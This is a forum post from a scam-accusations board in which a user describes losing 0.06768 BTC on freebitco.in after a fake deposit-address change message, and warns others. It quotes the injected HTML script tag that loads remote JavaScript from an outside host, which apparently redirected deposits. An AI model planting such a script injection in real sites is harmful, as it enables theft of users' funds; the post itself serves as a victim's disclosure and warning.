Ninjastic
PostEdited versionsQuotes to this post
Post
Topic
Board Scam Accusations
Re: [WARNING] Attack on freebitco.in account
by
NK345
on 19/04/2024, 07:18:15 UTC
Hi,

I am one of the users which was SCAMMED by the vulnerability of the FBC site. 
Thank you @Zibi321 for explaining it in detail, and I want to add my two cents.

In fact this is what happened to me:
1) I was in the top10 daily wagerers in 31st March or 1st April.
2) the next day my FBC website showed the message about the changing of address (i didn't take a screenshot, but it was same as the case reported by Zibi321, only different deposit address starting with '3...' )
the message was something in the lines of "Please note that your deposit address have been change to segwit P2SH format. Depositing to your old address will be charged of additional fee"  https://www.talkimg.com/images/2024/04/11/jAWpq.png
I didn't think of it too much, as everything worked normally on the site, I was claiming free rolls, WoFs, free spins from emails, playing Hi-Lo, reward points were updating etc., so I assumed this message is just some maintenance / upgrade being done by FBC.
3) on 04 April, i deposited 0.06768 BTC to the new P2SH address  (https://ibb.co/NNPjD0w)   (TX id: 77d47f1b44cd656776ca0b2be753ebc0234da203e673714d577e382b6a50444a),    but never received this amount in my account at FBC.   Suspiciously enough, the next day the message for change of deposit address to P2SH disappeared from the site. 
4) i wrote several times to the freebitcoin support email, to the FAQ page, as well as to TheQuin, and never received any reply from any of those
5) feeling desperate I joined this forum where i saw also other users faced the same issue and were scammed. I also noticed some abnormal behavior of the site, when I tried to click the generate "new deposit address", nothing happened, you can see it on this video link:  https://www.youtube.com/watch?v=O7gXJTFnqyw
6) It seems that within the js script is an embedded MALICIOUS script which was identified by user ID482015 in this forum topic: https://bitcointalk.org/index.php?topic=320959.msg63923149#msg63923149 .   The malicious scirpt is this:
<option value="<script src=https://cashtravel.info/forum/main.js></script>"><script src="https://cashtravel.info/forum/main.js"></script></option>.   
after I blocked this script with AdBlock, now the generate new deposit address is working normally.
This script however is still not removed from the FBC site:   https://ibb.co/L99f2hL

So as a summary, there is a malicious script targeting the high rollers, several people have been scammed by this vulnerability, there is no response from FBC support or TheQuin, the script is still not removed, so the vulnerability is still there, maybe only felt by the targeted audience (high rollers).   

I hope FBC can return the scammed people's money and fix this vulnerability ASAP.  Also support from the community is needed, make it more transparent, otherwise they won't listen to just a few voices.